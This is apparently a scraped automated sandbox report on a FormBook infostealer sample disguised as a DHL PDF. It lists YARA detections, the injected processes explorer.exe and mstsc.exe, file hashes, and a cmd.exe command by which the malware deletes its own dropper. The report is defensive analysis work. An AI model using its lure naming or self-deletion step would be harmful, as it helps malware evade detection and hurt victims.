cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.817853007.0000000000EF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

Antivirus matches: Detection: 100%, Joe Sandbox MLDetection: 59%, ReversingLabs

Reputation: low




Path: C:\Windows\explorer.exe

Wow64 process (32bit): false

Commandline: C:\Windows\Explorer.EXE

Imagebase: 0x7ff6fee60000


Analysis Process: DHL_119040 Belegdokument,pdf.exe PID: 5776 Parent PID: 6884Analysis Process: DHL_119040 Belegdokument,pdf.exe PID: 5776 Parent PID: 6884

General

File ReadFile Read

Analysis Process: explorer.exe PID: 3424 Parent PID: 5776Analysis Process: explorer.exe PID: 3424 Parent PID: 5776

General



MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D




Yara matches: Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.801360464.000000000EA64000.00000040.00020000.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.801360464.000000000EA64000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.801360464.000000000EA64000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.778002486.000000000EA64000.00000040.00020000.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.778002486.000000000EA64000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.778002486.000000000EA64000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

Reputation: high





Path: C:\Windows\SysWOW64\mstsc.exe


Commandline: C:\Windows\SysWOW64\mstsc.exe

Imagebase: 0x8a0000


MD5 hash: 2412003BE253A515C620CE4890F3D8F3




Yara matches: Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.925022010.0000000000410000.00000040.00020000.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.925022010.0000000000410000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.925022010.0000000000410000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.925384355.0000000000840000.00000040.00020000.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.925384355.0000000000840000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.925384355.0000000000840000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.925416924.0000000000870000.00000004.00000001.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.925416924.0000000000870000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.925416924.0000000000870000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

Reputation: moderate


Analysis Process: mstsc.exe PID: 5176 Parent PID: 3424Analysis Process: mstsc.exe PID: 5176 Parent PID: 3424

General

File ReadFile ReadCopyright Joe Security LLC 2021 of 25

Joe Sandbox Cloud Basic 33.0.0 White Diamond

Disassembly

Code Analysis

Copyright Joe Security LLC




Path: C:\Windows\SysWOW64\cmd.exe


Commandline: /c del 'C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe'

Imagebase: 0x11d0000


MD5 hash: F3BDBE3BB6F734E357235F4D5898582D




Reputation: high




Path: C:\Windows\System32\conhost.exe

Wow64 process (32bit): false

Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Imagebase: 0x7ff724c50000


MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496




Reputation: high

Analysis Process: cmd.exe PID: 3144 Parent PID: 5176Analysis Process: cmd.exe PID: 3144 Parent PID: 5176

General

File DeletedFile Deleted

Analysis Process: conhost.exe PID: 3240 Parent PID: 3144Analysis Process: conhost.exe PID: 3240 Parent PID: 3144

General


http://www.joesecurity.org

Automated Malware Analysis Report for DHL_119040 ...

Documents

Transcript of Automated Malware Analysis Report for DHL_119040 ...